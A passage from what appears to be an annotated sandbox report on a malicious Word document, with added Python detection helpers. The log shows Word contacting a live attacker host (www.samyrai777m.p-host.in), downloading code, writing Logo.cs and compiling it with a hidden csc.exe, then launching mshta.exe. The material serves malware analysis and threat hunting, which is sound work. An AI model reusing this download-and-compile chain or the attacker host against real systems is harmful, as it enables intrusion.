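    """Group %TEMP% artifacts by stem; a stem with both .cmdline and .0.cs is one csc.exe run."""
    by_stem = defaultdict(set)
    for path in paths:
        hit = csc_artifact(path)
        if hit and "\\temp\\" in path.lower():
            by_stem[hit[0]].add(hit[1])
    return {stem: sorted(s) for stem, s in by_stem.items()
            if {".cmdline", ".0.cs"} <= s}


def loose_source_files(paths):
    """C# sources outside the csc temp pattern, e.g. written next to the opened document."""
    return [p for p in paths if p.lower().endswith(".cs") and csc_artifact(p) is None]


def office_spawning_script_host(ops):
    """(parent, child) pairs where an Office process successfully created a script host."""
    hits = []
    for parent, line in ops:
        m = PROC_CREATE_RE.search(line)
        if not m or m["success"] != "True":
            continue
        child = PureWindowsPath(m["image"].strip().lower()).name
        if parent.lower() in OFFICE_PARENTS and child in SCRIPT_HOSTS:
            hits.append((parent.lower(), child))
    return hits


def triage(paths, ops):
    """Combine the three signals into a verdict plus the evidence behind it."""
    evidence = {
        "runtime_compilation": find_runtime_compilations(paths),
        "loose_sources": loose_source_files(paths),
        "script_host_children": office_spawning_script_host(ops),
    }
    score = sum(1 for v in evidence.values() if v)
    verdict = "malicious" if score >= 2 else "suspicious" if score else "clean"
    return verdict, evidence


if __name__ == "__main__":
    verdict, evidence = triage(CREATED_FILES, PROCESS_OPS)
    print(verdict)
    for key, value in evidence.items():
        print(f"  {key}: {value}")
```

The compilation check keys on the .cmdline plus .0.cs pair rather than on csc.exe itself because, as in this report, the compiler process may not be among the monitored processes shown, while its temp files are; the 288-byte .cmdline, if retrieved from the sandbox, holds the exact compiler invocation and the .0.cs the generated source.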
Threads
Thread 0x9b4
(Host: 113, Network: 0)
Category Operation Information Success Count
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
System Get Info type = Operating System False 1
File Get Info filename = C:\Windows\system32\com\SOAPAssembly\, type = file_attributes False 1
File Get Info filename = C:\Windows\system32\com\SOAPAssembly, type = file_attributes False 1
File Get Info filename = C:\Windows\system32\com, type = file_attributes True 1
File Get Info filename = C:\Windows\system32, type = file_attributes True 1
File Get Info filename = C:\Windows, type = file_attributes True 1
File Create Directory C:\Windows\system32\com\SOAPAssembly False 1
System Get Info type = Operating System False 2
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\COM+ SOAP Services False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\COM+ SOAP Services False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\COM+ SOAP Services False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\COM+ SOAP Services False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\COM+ SOAP Services False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\COM+ SOAP Services False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\COM+ SOAP Services False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\COM+ SOAP Services False 1
File Get Info filename = C:\Users\aETAdzjz\Desktop\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll, type = file_attributes False 1
Process Create process_name = C:\Windows\System32\mshta.exe, show_window = SW_SHOWNORMAL True 1
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
File Get Info filename = C:\Windows\system32\com\SOAPAssembly\, type = file_attributes False 1
File Get Info filename = C:\Windows\system32\com\SOAPAssembly, type = file_attributes False 1
File Get Info filename = C:\Windows\system32\com, type = file_attributes True 1
File Get Info filename = C:\Windows\system32, type = file_attributes True 1
File Get Info filename = C:\Windows, type = file_attributes True 1
File Create Directory C:\Windows\system32\com\SOAPAssembly False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\COM+ SOAP Services False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\COM+ SOAP Services False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\COM+ SOAP Services False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\COM+ SOAP Services False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\COM+ SOAP Services False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\COM+ SOAP Services False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\Desktop\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll, type = file_attributes True 1
Fn
Process Create process_name = C:\Windows\System32\mshta.exe, show_window = SW_SHOWNORMAL True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
File Get Info filename = C:\Windows\system32\com\SOAPAssembly\, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\system32\com\SOAPAssembly, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\system32\com, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\system32, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows, type = file_attributes True 1
Fn
File Create Directory C:\Windows\system32\com\SOAPAssembly False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\COM+ SOAP Services False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\COM+ SOAP Services False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\Desktop\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll, type = file_attributes True 1
Fn
Process Create process_name = C:\Windows\System32\mshta.exe, show_window = SW_SHOWNORMAL True 1
Fn
Thread 0xb60
(Host: 113, Network: 20)
Category Operation Information Success Count Logfile
Module Get Filename process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE, size = 260 True 1 Fn
System Get Info type = Operating System False 1 Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_attributes True 2 Fn
File Create filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1 Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_type True 2 Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = size, size_out = 0 True 1 Fn
File Read filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 True 6 Fn Data
File Read filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 1459 True 1 Fn Data
File Read filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 True 1 Fn
Module Get Filename process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE, size = 260 True 1 Fn
File Get Info filename = C:\Program Files\Microsoft Office\root\Office16\WINWORD.config, type = file_attributes False 2 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ True 1 Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1 Fn
Socket Close type = SOCK_DGRAM True 1 Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1 Fn
Socket Close type = SOCK_DGRAM True 1 Fn
System Get Computer Name result_out = YKYD69Q True 1 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1 Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY True 2 Fn Data
Module Create Mapping filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1 Fn
Module Map process_name = c:\program files\microsoft office\root\office16\winword.exe, desired_access = FILE_MAP_WRITE True 1 Fn
System Get Info type = Operating System False 2 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking False 1 Fn
Mutex Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Mutex Create mutex_name = Global\.net clr networking True 1 Fn
Mutex Release mutex_name = Global\.net clr networking True 1 Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1 Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1 Fn
Registry Open Key reg_name = HKEY_CURRENT_USER True 1 Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1 Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1 Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1 Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1 Fn
DNS Resolve Name host = www.samyrai777m.p-host.in, address_out = 185.211.244.133 True 1 Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1 Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1 Fn
Socket Connect remote_address = 185.211.244.133, remote_port = 80 True 1 Fn
Socket Close type = SOCK_STREAM True 1 Fn
Socket Send flags = NO_FLAG_SET, size = 92, size_out = 92 True 1 Fn Data
Inet Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1 Fn
Inet Open Connection protocol = http, server_name = www.samyrai777m.p-host.in, server_port = 80 True 1 Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /t/tp.php?thread=0 True 1 Fn
Inet Send HTTP Request headers = host: www.samyrai777m.p-host.in, connection: Keep-Alive, url = www.samyrai777m.p-host.in/t/tp.php?thread=0 True 1 Fn Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 1240 True 1 Fn Data
Inet Read Response size = 4096, size_out = 1240 True 1 Fn Data
File Create filename = C:\Users\aETAdzjz\Desktop\Logo.cs, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1 Fn
File Get Info filename = C:\Users\aETAdzjz\Desktop\Logo.cs, type = file_type True 2 Fn
File Write filename = C:\Users\aETAdzjz\Desktop\Logo.cs, size = 1098 True 1 Fn Data
File Create filename = C:\Users\aETAdzjz\Desktop\Logo.cs, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1 Fn
File Get Info filename = C:\Users\aETAdzjz\Desktop\Logo.cs, type = file_type True 2 Fn
File Read filename = C:\Users\aETAdzjz\Desktop\Logo.cs, size = 4096, size_out = 1098 True 1 Fn Data
File Read filename = C:\Users\aETAdzjz\Desktop\Logo.cs, size = 950, size_out = 0 True 1 Fn
File Read filename = C:\Users\aETAdzjz\Desktop\Logo.cs, size = 4096, size_out = 0 True 1 Fn
System Get Info type = Operating System False 1 Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.tmp, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1 Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.tmp, type = file_type True 2 Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.0.cs, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1 Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.0.cs, type = file_type True 2 Fn
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.0.cs, size = 1101 True 1 Fn Data
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1 Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline, type = file_type True 2 Fn
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline, size = 288 True 1 Fn Data
File Get Info filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe, type = file_attributes True 1 Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.out, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1 Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.out, type = file_type True 2 Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.err, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1 Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.err, type = file_type True 2 Fn
File Write filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.out, size = 379 True 1 Fn Data
File Open filename = STD_INPUT_HANDLE True 1 Fn
Process Create process_name = "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline", os_pid = 0xba0, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1 Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.pdb False 1 Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.out True 1 Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.tmp True 1 Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.0.cs True 1 Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.cmdline True 1 Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Local\Temp\91rxrejg.err True 1 Fn
File Delete filename = C:\Users\aETAdzjz\Desktop\__Sn.cs False 1 Fn
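Two rows in this process tie the network indicator to the disk indicator: the earlier thread repeatedly checks for C:\Users\aETAdzjz\Desktop\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll, and thread 0xb60 resolves and fetches www.samyrai777m.p-host.in/t/tp.php?thread=0 before the generated Logo.cs is handed to csc.exe. The file name is the WSDL URL with its punctuation rewritten. The script below is an added example (not part of the VMRay report, not VMRay's or Microsoft's code) that reproduces the rewrite so a proxy-log URL can be turned into the file name to hunt for on endpoints. The substitution table is inferred only from the one URL/DLL pair visible in this report; characters the pair does not contain raise instead of being guessed, and the proxy lines are constructed.

```python
"""Predict the on-disk assembly name the SOAP moniker looks for given a WSDL URL.

Added example; not part of the VMRay report. The substitution table is inferred
from the single URL/DLL pair visible in this report:

  URL  http://www.samyrai777m.p-host.in/t/tp.php?thread=0
  DLL  http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll

Only characters that occur in that URL have a known mapping; anything else
raises rather than guessing.
"""

# Inferred from the observed pair above. Assumption: the same table applies to
# every URL, which a single sample cannot prove.
INFERRED_SUBSTITUTIONS = {
    "/": "0",
    ":": "1",
    "?": "2",
    ".": "4",
    "=": "9",
}


def soap_assembly_name(url: str) -> str:
    """Map a soap:wsdl= URL to the file name the moniker probed for on disk."""
    out = []
    for ch in url:
        if ch.isalnum() or ch == "-":      # letters, digits and '-' pass through unchanged
            out.append(ch)
        elif ch in INFERRED_SUBSTITUTIONS:
            out.append(INFERRED_SUBSTITUTIONS[ch])
        else:
            raise ValueError(f"no mapping observed in this trace for {ch!r}")
    return "".join(out) + ".dll"


def artifacts_from_proxy_log(lines):
    """Turn proxy-log URLs into file names to sweep for on endpoints.

    Returns {url: dll_name}. URLs containing characters outside the inferred
    table are skipped so that a guess never becomes a hunt indicator.
    """
    found = {}
    for line in lines:
        for token in line.split():
            if not token.startswith(("http://", "https://")):
                continue
            try:
                found[token] = soap_assembly_name(token)
            except ValueError:
                continue
    return found


# Constructed sample proxy lines: the first URL is the one in the report, the
# second is made up and contains '&', which the inferred table does not cover.
SAMPLE_PROXY_LOG = [
    "t+0s 10.0.0.5 GET http://www.samyrai777m.p-host.in/t/tp.php?thread=0 200",
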